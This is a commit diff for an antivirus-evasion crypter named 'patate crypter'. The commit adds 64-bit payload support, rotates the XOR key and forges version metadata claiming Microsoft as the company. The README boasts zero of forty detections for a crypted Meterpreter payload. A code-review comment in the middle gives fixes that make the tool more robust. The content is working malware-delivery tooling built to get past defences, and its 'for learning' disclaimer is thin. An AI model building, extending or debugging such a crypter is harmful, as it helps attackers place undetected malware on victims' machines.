add: x64 bit support, automatic detection of architecture, 0/40 detects in x64 bit

2024-03-19 10:29:40 +01:00
parent 4d6b376c03
commit 4c45ea8422
8 changed files with 45 additions and 25 deletions


@@ -37,6 +37,7 @@ from PyQt5.QtGui import QPixmap
from obfuscation import obfuscate from obfuscation import obfuscate
from metadata import change_metadata from metadata import change_metadata
import os, shutil, glob import os, shutil, glob
import pefile
class Ui_mainWindow(object): class Ui_mainWindow(object):
def __init__(self) : def __init__(self) :
@@ -141,6 +142,7 @@ class Ui_mainWindow(object):
self.checkBox_3.setText(_translate("mainWindow", "Control flow")) self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
def generate(self) : def generate(self) :
is_64bit = False
in_filename = self.filepath in_filename = self.filepath
out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe" out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe"
xor_key = '' xor_key = ''
@@ -155,6 +157,19 @@ class Ui_mainWindow(object):
QCoreApplication.processEvents() QCoreApplication.processEvents()
return return
try :
pe = pefile.PE(in_filename)
except :
self.label_2.setText("File is not a binary.")
QCoreApplication.processEvents()
return
if hex(pe.FILE_HEADER.Machine) == '0x14c':
self.label_2.setText("File is a 32-bit binary")
else:
self.label_2.setText("File is a 64-bit binary")
is_64bit = True
QCoreApplication.processEvents()
self.label_2.setText("Creating sample header...") self.label_2.setText("Creating sample header...")
QCoreApplication.processEvents() QCoreApplication.processEvents()
@@ -184,7 +199,7 @@ class Ui_mainWindow(object):
self.label_2.setText("Adding junk code...") self.label_2.setText("Adding junk code...")
QCoreApplication.processEvents() QCoreApplication.processEvents()
obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk) obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk, is_64bit)
self.label_2.setText("done.") self.label_2.setText("done.")
QCoreApplication.processEvents() QCoreApplication.processEvents()
@@ -201,8 +216,12 @@ class Ui_mainWindow(object):
vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe
cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe" cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"
if is_64bit :
return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x64;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
else :
return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
if return_code : if return_code :
self.label_2.setText("build failed.") self.label_2.setText("build failed.")
QCoreApplication.processEvents() QCoreApplication.processEvents()
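Review bot: The `except :` around `pe = pefile.PE(in_filename)` is a bare except, so a missing file, a permission error or even KeyboardInterrupt is swallowed and reported as "File is not a binary."; narrow it to the parser's own error, `except pefile.PEFormatError:`, and let everything else surface. The architecture test compares a formatted string, `hex(pe.FILE_HEADER.Machine) == '0x14c'`; comparing the integer with the library constant is clearer and not dependent on `hex()` formatting: `if pe.FILE_HEADER.Machine == pefile.MACHINE_TYPE['IMAGE_FILE_MACHINE_I386']:`. The `else` branch then labels every non-i386 machine type as 64-bit, so an image for any other architecture would be handed to the x64 build path; testing `IMAGE_FILE_MACHINE_AMD64` explicitly and reporting anything else as unsupported looks safer. The parsed `pe` object is never released; a `pe.close()` once `Machine` has been read frees the file mapping before the later steps operate on the same path. `generate` starts and ends outside the shown hunks.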


@@ -149,7 +149,7 @@ def GetRandomControlFlow():
return cpp_code return cpp_code
FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"} FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
def obfuscate(PASS, CFLOW_PASS, cflow, junk) : def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
if PASS < CFLOW_PASS : PASS = CFLOW_PASS if PASS < CFLOW_PASS : PASS = CFLOW_PASS
if not cflow and not junk : PASS = 0 if not cflow and not junk : PASS = 0
@@ -237,7 +237,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
if GetRandomBool() and in_func : # do we call a function ? if GetRandomBool() and in_func : # do we call a function ?
out.append(CallRandomFunction()+"\n") out.append(CallRandomFunction()+"\n")
if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ? if GetRandomBool() and in_func and cflow and k < CFLOW_PASS and not is64bit : # do we mess up control flow ?
out.append(GetRandomAssemblyBlock()+"\n") out.append(GetRandomAssemblyBlock()+"\n")
if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ? if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?


@@ -1,2 +1,3 @@
pillow pillow
pywin32 pywin32
pefile


@@ -1,2 +1,2 @@
#pragma once #pragma once
#define KEY "mkhjqsdhfjbzqfcqzf" #define KEY "pqihzifvqzidbzq"


@@ -68,12 +68,12 @@ BEGIN
BLOCK "040c04b0" BLOCK "040c04b0"
BEGIN BEGIN
VALUE "CompanyName", "Microsoft" VALUE "CompanyName", "Microsoft"
VALUE "FileDescription", "clgdknugqsthezarlwbq" VALUE "FileDescription", "mwqaxnynrtvjaafmtwew"
VALUE "FileVersion", "1.0.0.1" VALUE "FileVersion", "1.0.0.1"
VALUE "InternalName", "yhoqres.exe" VALUE "InternalName", "hoflypx.exe"
VALUE "LegalCopyright", "Copyright (C) 2023" VALUE "LegalCopyright", "Copyright (C) 2023"
VALUE "OriginalFilename", "erbggay.exe" VALUE "OriginalFilename", "ckhvspq.exe"
VALUE "ProductName", "awwmoqx.exe" VALUE "ProductName", "rrrxbyl.exe"
VALUE "ProductVersion", "1.0.0.1" VALUE "ProductVersion", "1.0.0.1"
END END
END END


@@ -49,7 +49,7 @@
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries> <UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset> <PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
@@ -138,6 +138,7 @@
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions> <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp17</LanguageStandard> <LanguageStandard>stdcpp17</LanguageStandard>
<OmitFramePointers>false</OmitFramePointers>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
@@ -148,20 +149,24 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<WarningLevel>Level3</WarningLevel> <WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking> <FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>false</IntrinsicFunctions>
<SDLCheck>true</SDLCheck> <SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp17</LanguageStandard> <LanguageStandard>stdcpp17</LanguageStandard>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<Optimization>Disabled</Optimization>
<OmitFramePointers>false</OmitFramePointers>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding> <EnableCOMDATFolding>false</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>false</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<AdditionalOptions>/NXCOMPAT:no %(AdditionalOptions)</AdditionalOptions> <AdditionalOptions>/NXCOMPAT:no %(AdditionalOptions)</AdditionalOptions>
<GenerateWindowsMetadata>false</GenerateWindowsMetadata>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>


@@ -18,9 +18,6 @@
<ClCompile Include="main.cpp"> <ClCompile Include="main.cpp">
<Filter>Fichiers sources</Filter> <Filter>Fichiers sources</Filter>
</ClCompile> </ClCompile>
<ClCompile Include="anti_emu.cpp">
<Filter>Fichiers sources</Filter>
</ClCompile>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="config.h"> <ClInclude Include="config.h">
@@ -32,9 +29,6 @@
<ClInclude Include="sample.h"> <ClInclude Include="sample.h">
<Filter>Fichiers d%27en-tête</Filter> <Filter>Fichiers d%27en-tête</Filter>
</ClInclude> </ClInclude>
<ClInclude Include="anti_emu.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ResourceCompile Include="patate-crypter.rc"> <ResourceCompile Include="patate-crypter.rc">


@@ -4,14 +4,15 @@ The project structure is **very** messy because i wasn't planning on releasing i
I will not provide any support for running the program, it is only made for people interested in cyber security to learn more about how AV work. I will not provide any support for running the program, it is only made for people interested in cyber security to learn more about how AV work.
# Limitations # Limitations
patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br> patate crypter officially supports 32bit and 64bit DLLs and PEs.<br>
There is an issue where the reallocations would fail for specific payloads, TOFIX.<br> There is an issue where the reallocations would fail for specific payloads, TOFIX.<br>
There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)). There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)).
# Detection rate # Detection rate
There is currently 0/40 detections for a crypted meterperter : There is currently 0/40 detections for a crypted meterperter :
- [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e) - [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e)
- [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54) - [crypted 32 bit](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
- [crypted 64 bit](https://www.kleenscan.com/scan_result/9c0ae91e19425ff4c2d8120f1cb787f0480c7780faa6e1e57517b2aea831e272)
# How does it work ? # How does it work ?
The crypter (compile time) works by : The crypter (compile time) works by :